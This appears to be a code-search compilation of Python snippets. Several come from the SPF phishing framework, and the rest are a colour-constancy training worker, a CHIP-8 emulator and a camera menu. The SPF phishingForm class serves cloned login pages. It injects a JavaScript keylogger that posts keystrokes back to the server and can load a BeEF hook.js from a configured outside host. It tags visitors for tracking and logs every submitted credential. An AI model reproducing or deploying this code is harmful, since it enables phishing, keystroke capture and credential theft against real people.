Example #1
File: web.py Project: webvul/SPF
    def __init__(self,
                 config,
                 vhost,
                 path,
                 logpath,
                 logfile,
                 db,
                 redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db

        # build list of "bad" ips and networks based on https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
        self.bannedIP = Utils.listToIpAddresses(
            Utils.fileToList("misc/ips.redirect"))
        self.bannedCIDR = Utils.listToIpNetworks(
            Utils.fileToList("misc/ranges.redirect"))

        Resource.__init__(self)
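
The constructor above only builds the banned IP and CIDR lists; the code that consults them is outside this snippet. A minimal sketch of how such a check could look, assuming Utils.listToIpAddresses and Utils.listToIpNetworks return standard-library ipaddress objects (the is_banned helper below is hypothetical, not SPF API):

import ipaddress

def is_banned(client_ip, banned_ips, banned_networks):
    # banned if the client address matches a listed IP
    # or falls inside one of the listed CIDR ranges
    addr = ipaddress.ip_address(client_ip)
    return addr in banned_ips or any(addr in net for net in banned_networks)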
Example #2
    def __init__(self,
                 fold,
                 conf,
                 data_conf,
                 cache_manager,
                 args,
                 inference=False,
                 verbose=True):
        self._args = args
        self._fold = fold
        self._conf = conf
        self._data_conf = data_conf
        self._inference = inference
        self._verbose = verbose
        self.tmp_dir = self._data_conf['tmp']

        # we save output with this folder structure:
        # output/
        #       -> tensorboard/ (tensorboard results)
        #       -> results/ (output files: images, illuminant, GT, etc...)
        #       -> checkpoint.pth.tar (checkpoint to continue training in case of failure)
        #       -> model_best.pth.tar (best checkpoint, for inference)
        self._pretrained_model = None
        if not self._inference:
            output_dir = os.path.join(self._args.outputfolder, str(self._fold))
            self._tensorboard_dir = os.path.join(output_dir, 'tensorboard')
            self._results_dir = os.path.join(output_dir, 'results')
            self._best_checkpoint_file = os.path.join(output_dir,
                                                      'model_best.pth.tar')
            self._checkpoint_file = os.path.join(output_dir,
                                                 'checkpoint.pth.tar')
            self._pretrained_model = self._args.pretrainedmodel

            # create all directories
            os.makedirs(self._tensorboard_dir, exist_ok=True)
        else:
            # for inference all results are saved under the output directory
            # (images, illuminant, GT, etc...)
            self._results_dir = self._args.outputfolder
            if isinstance(self._args.checkpointfile, list):
                self._checkpoint_file = self._args.checkpointfile[fold]
            else:
                self._checkpoint_file = self._args.checkpointfile

        self._display = Display(self._conf)
        self._factory = Factory(self._conf, self._data_conf, cache_manager,
                                self._args, verbose)
        self._cache_manager = cache_manager

        # create output directory
        os.makedirs(self._results_dir, exist_ok=True)

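        # TORCH_HOME controls where torch/torchvision download pretrained weights;
        # pointing it at a project-local torch_model_zoo/ keeps them out of the user cache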
        os.environ['TORCH_HOME'] = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), os.pardir,
            'torch_model_zoo')
Example #3
File: web.py Project: vmlinuxer/SPF
def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
    self.index = ""
    self.vhost = vhost
    self.path = path
    self.logpath = logpath
    self.logfile = logfile
    self.redirecturl = redirecturl
    self.config = config
    self.loadIndex()
    self.display = Display()
    self.display.setLogPath(self.logpath)
    self.db = db
    Resource.__init__(self)
Example #4
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open(self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            # enable mobile device redirect
            html = re.sub("</head>", "<script>(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|)|g1 u|g560|gene|gf-5|g-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| ||a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,<site_url>/mobile.html');</script>", html, flags=re.I)

            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS],%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #5
File: web.py Project: vmlinuxer/SPF
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open(self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS],%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #6
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open(self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS].%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #7
def __init__(self, config, vhost, path, logpath, logfile, redirecturl="error"):
    self.index = ""
    self.vhost = vhost
    self.path = path
    self.logpath = logpath
    self.logfile = logfile
    self.redirecturl = redirecturl
    self.config = config
    self.loadIndex()
    self.display = Display()
    self.display.setLogPath(self.logpath)
    Resource.__init__(self)
Example #8
    def __init__(self):
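        # core components: 4 KB (0x1000 bytes) of memory, a 64x32 pixel display,
        # and two 60 Hz timers (delay and sound)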
        self._memory = Memory(0x1000)
        self._display = Display(64, 32)
        self._delay_timer = Timer(freq=60)
        self._sound_timer = Timer(freq=60)

        self._sound = Sound(self._sound_timer)
        self._cpu = Cpu(self._memory,
                        self._display,
                        delay_timer=self._delay_timer,
                        sound_timer=self._sound_timer)

        self._fps_time = datetime.now()

        pygame.init()
Example #9
class Worker():
    def __init__(self,
                 fold,
                 conf,
                 data_conf,
                 cache_manager,
                 args,
                 inference=False,
                 verbose=True):
        self._args = args
        self._fold = fold
        self._conf = conf
        self._data_conf = data_conf
        self._inference = inference
        self._verbose = verbose
        self.tmp_dir = self._data_conf['tmp']

        # we save output with this folder structure:
        # output/
        #       -> tensorboard/ (tensorboard results)
        #       -> results/ (output files: images, illuminant, GT, etc...)
        #       -> checkpoint.pth.tar (checkpoint to continue training in case of failure)
        #       -> model_best.pth.tar (best checkpoint, for inference)
        self._pretrained_model = None
        if not self._inference:
            output_dir = os.path.join(self._args.outputfolder, str(self._fold))
            self._tensorboard_dir = os.path.join(output_dir, 'tensorboard')
            self._results_dir = os.path.join(output_dir, 'results')
            self._best_checkpoint_file = os.path.join(output_dir,
                                                      'model_best.pth.tar')
            self._checkpoint_file = os.path.join(output_dir,
                                                 'checkpoint.pth.tar')
            self._pretrained_model = self._args.pretrainedmodel

            # create all directories
            os.makedirs(self._tensorboard_dir, exist_ok=True)
        else:
            # for inference all results are saved under the output directory
            # (images, illuminant, GT, etc...)
            self._results_dir = self._args.outputfolder
            if isinstance(self._args.checkpointfile, list):
                self._checkpoint_file = self._args.checkpointfile[fold]
            else:
                self._checkpoint_file = self._args.checkpointfile

        self._display = Display(self._conf)
        self._factory = Factory(self._conf, self._data_conf, cache_manager,
                                self._args, verbose)
        self._cache_manager = cache_manager

        # create output directory
        os.makedirs(self._results_dir, exist_ok=True)

        os.environ['TORCH_HOME'] = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), os.pardir,
            'torch_model_zoo')

    # function used to determine the best epoch
    def _compute_best(self, best, train_stats, val_stats):
        metric = train_stats.mean_loss
        if 'choose_best_epoch_by' in self._conf:
            if self._conf['choose_best_epoch_by'] == 'mean_angular_error':
                metric = train_stats.mean_err
            elif self._conf['choose_best_epoch_by'] == 'median_angular_error':
                metric = train_stats.med_err
            elif self._conf['choose_best_epoch_by'] == 'mean_loss':
                metric = train_stats.mean_loss
            elif self._conf[
                    'choose_best_epoch_by'] == 'val_median_angular_error':
                metric = val_stats.med_err
            else:
                raise Exception('Invalid "choose_best_epoch_by" option')

        is_best = metric < best
        best = min(metric, best)

        return is_best, best

    # function to print the epoch info
    def _log_epoch(self, epoch, train_stats, val_stats):
        if self._verbose and epoch % self._conf['print_frequency_epoch'] == 0:
            print(
                'Epoch [{}]: AE (mean={:.4f} med={:.4f}) loss {:.4f} time={:.1f}'
                .format(epoch, train_stats.mean_err, train_stats.med_err,
                        train_stats.mean_loss, train_stats.time),
                end='')
            if val_stats is not None:
                print(
                    ' (val: AE (mean={:.4f} med={:.4f}) loss={:.4f} time={:.4f})\t'
                    .format(val_stats.mean_err, val_stats.med_err,
                            val_stats.mean_loss, val_stats.time),
                    end='')
            print()

        # 1. Log scalar values (scalar summary)
        info = {
            'Epoch Loss': train_stats.mean_loss,
            'Epoch Mean AE': train_stats.mean_err,
            'Epoch Median AE': train_stats.med_err
        }
        if val_stats is not None:
            info.update({
                'Epoch Loss (validation)': val_stats.mean_loss,
                'Epoch Mean AE (validation)': val_stats.mean_err,
                'Epoch Median AE (validation)': val_stats.med_err
            })

        for tag, value in info.items():
            self.logger.scalar_summary(tag, value, epoch)

    def run(self):
        args = self._args
        gpu = args.gpu
        self._conf['use_gpu'] = gpu is not None

        if self._verbose:
            if gpu is not None:
                print("Using GPU: {}".format(gpu))
            else:
                print(
                    "WARNING: You're training on the CPU, this could be slow!")

        # create transforms
        transforms = create_all_transforms(self, self._conf['transforms'])
        # copy FFCC histogram settings to conf (from transform settings)
        self._conf['log_uv_warp_histogram'] = find_loguv_warp_conf(transforms)

        # create model
        self.model = self._factory.get_model()

        # if we're evaluating instead of training:
        # 1. init the model (without training illuminants)
        # 2. load model weights
        if args.evaluate:
            self.model.initialize()
            if self._inference:
                checkpoint = self._checkpoint_file
            else:
                checkpoint = self._best_checkpoint_file

            # optionally resume from a checkpoint
            start_epoch, best, self.model = self._factory.resume_from_checkpoint(
                checkpoint, self.model, None, gpu)
        else:
            checkpoint = self._checkpoint_file

        # create validation/test transforms if defined, otherwise, the same as training
        if self._conf['transforms_valtest'] is not None:
            transforms_valtest = create_all_transforms(
                self, self._conf['transforms_valtest'])
        else:
            transforms_valtest = transforms

        if gpu is not None:
            torch.cuda.set_device(gpu)
            cudnn.benchmark = True

        if args.testfile is not None:
            # test loader
            test_dataset, test_loader, test_loader_cache = self._factory.get_loader(
                args.testfile, transforms_valtest, gpu)
            # if evaluating, copy model to GPU, evaluate and die
            if args.evaluate:
                if gpu is not None:
                    self.model = self.model.cuda(gpu)
                return self.validate(test_loader)  # we finish here!

        # if validation file is defined
        if args.valfile is not None:
            # to save memory, don't do it again if valfile==testfile
            if args.valfile == args.testfile:
                val_dataset = test_dataset
                val_loader = test_loader
                val_loader_cache = test_loader_cache
            else:
                # validation loader
                val_dataset, val_loader, val_loader_cache = self._factory.get_loader(
                    args.valfile, transforms_valtest, gpu)

        # training loader
        train_dataset, train_loader, train_loader_cache = self._factory.get_loader(
            args.trainfiles, transforms, gpu, train=True)

        # init model with the training set illuminants
        self.model.initialize(train_dataset.get_illuminants_by_sensor())

        # optionally pretrain model
        self._factory.pretrain_model(self._pretrained_model, self.model)

        # optionally resume from a checkpoint
        self.optimizer, optimizer_name = self._factory.get_optimizer(
            self.model)
        start_epoch, best, self.model = self._factory.resume_from_checkpoint(
            checkpoint, self.model, self.optimizer, gpu)

        # define loss function
        self.criterion = self._factory.get_criterion()

        # tensorboard logger
        self.logger = TensorBoardLogger(self._tensorboard_dir)

        # learning rate scheduler (if defined)
        scheduler, scheduler_name = self._factory.get_lr_scheduler(
            start_epoch, self.optimizer)

        # copy stuff to GPU
        if gpu is not None:
            self.criterion = self.criterion.cuda(gpu)
            self.model = self.model.cuda(gpu)

        # for FFCC, we reset the optimizer after some epochs
        # because they use two loss functions, ugly trick
        # TODO: fix
        reset_opt = -1
        if 'reset_optimizer_epoch' in self._conf:
            reset_opt = self._conf['reset_optimizer_epoch']

        # load data for the first time
        # we use the cache loaders, they define batch size=1
        # so that we can see the progress with tqdm
        if self._cache_manager.transforms().length > 0 and self._fold == 0:
            if self._verbose:
                print('Caching images...')
            for data in tqdm(train_loader_cache,
                             desc="Training set",
                             disable=not self._verbose):
                pass
            if args.testfile is not None:
                for data in tqdm(test_loader_cache,
                                 desc="Test set",
                                 disable=not self._verbose):
                    pass
            if args.valfile is not None and args.testfile != args.valfile:
                for data in tqdm(val_loader_cache,
                                 desc="Validation set",
                                 disable=not self._verbose):
                    pass

        # if epochs==0, we don't really want to train,
        # we only want to do the candidate selection process for our method
        if self._conf['epochs'] == 0:
            print('WARNING: Training 0 epochs')
            checkpoint = {
                'epoch': 0,
                'arch': self._conf['network']['arch'],
                'subarch': self._conf['network']['subarch'],
                'state_dict': self.model.state_dict(),
                'best': float("inf"),
                'optimizer': self.optimizer.state_dict()
            }
            self._factory.save_checkpoint(self._checkpoint_file,
                                          self._best_checkpoint_file,
                                          checkpoint,
                                          is_best=True)

        # epoch loop
        for epoch in range(start_epoch, self._conf['epochs']):
            # ugly trick for FFCC 2 losses
            if epoch == reset_opt:
                if self._verbose:
                    print('Reset optimizer and lr scheduler')
                best = float("inf")
                self.optimizer, optimizer_name = self._factory.get_optimizer(
                    self.model)
                # TODO: What if lr scheduler changes its internal API?
                if scheduler is not None:
                    scheduler.optimizer = self.optimizer

            # train for one epoch
            train_stats = self.train(train_loader, epoch)

            # validation
            val_stats = None
            if args.valfile is not None:
                _, val_stats = self.validate(val_loader, epoch)

            # compute the best training epoch
            is_best, best = self._compute_best(best, train_stats, val_stats)

            # log epoch details
            self._log_epoch(epoch, train_stats, val_stats)

            # learning rate scheduler
            if scheduler is not None:
                # TODO: hardcoded
                if scheduler_name == 'ReduceLROnPlateau':
                    scheduler.step(train_stats.mean_err)
                else:
                    scheduler.step()

            # save checkpoint!
            checkpoint = {
                'epoch': epoch + 1,
                'arch': self._conf['network']['arch'],
                'subarch': self._conf['network']['subarch'],
                'state_dict': self.model.state_dict(),
                'best': best,
                'optimizer': self.optimizer.state_dict()
            }
            self._factory.save_checkpoint(self._checkpoint_file,
                                          self._best_checkpoint_file,
                                          checkpoint, is_best)

        # get results for the best model
        start_epoch, best, self.model = self._factory.load_model(
            self._best_checkpoint_file, self.model, self.optimizer, gpu)

        # return results from best epoch
        if args.testfile is not None:
            start_time = time.time()
            results = self.validate(test_loader)
            if self._verbose:
                print(
                    'Final inference (including generation of output files) took {:.4f}'
                    .format(time.time() - start_time))
            return results
        else:
            # for some datasets, we have no validation ground truth,
            # so, no evaluation possible
            return [], EpochStats(-1, -1, -1, 0)

    # log iteration
    def _log_iteration(self, epoch, step, len_epoch, loss, err, data, output):
        real_step = epoch * len_epoch + step
        if self._conf['tensorboard_frequency'] != -1 and real_step % self._conf[
                'tensorboard_frequency'] == 0:
            # Log scalar values (scalar summary)
            info = {'Loss': loss, 'Angular Error': err}

            for tag, value in info.items():
                self.logger.scalar_summary(tag, value, real_step)

            # Log values and gradients of the parameters (histogram summary)
            for tag, value in self.model.named_parameters():
                tag = tag.replace('.', '/')
                if value.requires_grad:
                    if value.grad is None:
                        print('WARNING: variable ', tag, '.grad is None!')
                    else:
                        self.logger.histo_summary(tag,
                                                  value.data.cpu().numpy(),
                                                  real_step)
                        self.logger.histo_summary(
                            tag + '/grad',
                            value.grad.data.cpu().numpy(), real_step)

            if 'confidence' in output:
                self.logger.histo_summary(
                    'confidence',
                    output['confidence'].data.cpu().numpy().flatten(),
                    real_step)

        if self._conf[
                'tensorboard_frequency_im'] != -1 and real_step % self._conf[
                    'tensorboard_frequency_im'] == 0:
            # Log training images (image summary)
            info = self._display.get_images(data, output)

            for tag, images in info.items():
                self.logger.image_summary(tag, images, real_step)

    def train(self, train_loader, epoch):
        start_t = time.time()  # log starting time
        self.model.train()  # switch to train mode

        # angular errors and loss lists
        angular_errors = []
        loss_vec = []

        # batch loop
        for step, data in enumerate(train_loader):
            data['epoch'] = epoch  # we know what's the current epoch
            err = err_m = output = loss = None

            def closure():
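                # this closure re-runs the forward/backward pass; optimizers such as
                # LBFGS may invoke it several times within a single step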
                nonlocal err, err_m, output, loss

                self.optimizer.zero_grad()
                output = self.model(data)

                loss = self.criterion(output, data, self.model)
                loss.backward()
                err_m = angular_error_degrees(
                    output['illuminant'],
                    Variable(data['illuminant'],
                             requires_grad=False)).detach()
                err = err_m.sum().item() / err_m.shape[0]
                return loss

            self.optimizer.step(closure)
            angular_errors += err_m.cpu().data.tolist()
            loss_value = loss.detach().item()
            loss_vec.append(loss_value)

            self._log_iteration(epoch, step, len(train_loader), loss_value,
                                err, data, output)

        angular_errors = np.array(angular_errors)
        mean_err = angular_errors.mean()
        med_err = np.median(angular_errors)

        mean_loss = np.array(loss_vec).mean()

        t = time.time() - start_t
        return EpochStats(mean_err, med_err, mean_loss, t)

    def validate(self, val_loader, epoch=None):
        with torch.no_grad():  # don't compute gradients
            save_full_res = self._args.save_fullres
            training = epoch is not None
            start_t = time.time()
            # switch to evaluate mode
            self.model.eval()

            res = []
            angular_errors = []
            loss_vec = []

            for i, data in enumerate(val_loader):
                if training:
                    data['epoch'] = epoch
                # compute output
                output = self.model(data)

                # measure accuracy and save loss
                err = None
                if 'illuminant' in data:
                    if training:
                        loss = self.criterion(output, data, self.model)
                        loss_vec.append(loss.detach().item())
                    err = angular_error_degrees(
                        output['illuminant'],
                        Variable(data['illuminant'],
                                 requires_grad=False)).data.cpu().tolist()
                    angular_errors += err

                # When training, we don't want to save validation images
                if not training:
                    res += self._display.save_output(data, output, err,
                                                     val_loader.dataset,
                                                     self._results_dir,
                                                     save_full_res)

            # some datasets have no validation GT
            mean_err = med_err = mean_loss = -1

            if len(angular_errors) > 0:
                angular_errors = np.array(angular_errors)
                mean_err = angular_errors.mean()
                med_err = np.median(angular_errors)

            if len(loss_vec) > 0:
                mean_loss = np.array(loss_vec).mean()

            t = time.time() - start_t
            return res, EpochStats(mean_err, med_err, mean_loss, t)
Example #10
def do(conf, caps):
    ##
    # Extract cameras
    ##
    front = camera_setup(caps['front_camera'],
                         conf['calibration']['front_camera'])
    top = camera_setup(caps['top_camera'], conf['calibration']['top_camera'])
    menu = camera_setup(caps['top_camera'], conf['calibration']['menu_camera'])

    ##
    # Init Menu
    ##
    menu_conf = conf['menu']

    def process_color(c):
        if c is None:
            return None
        elif type(c) is str:
            return c
        else:
            return tuple(c)

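    # map each button's (bottom, upper) boundary pair to its processed color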
    menu_buttons = {(button['bottom'], button['upper']):
                    process_color(button['color'])
                    for button in menu_conf}

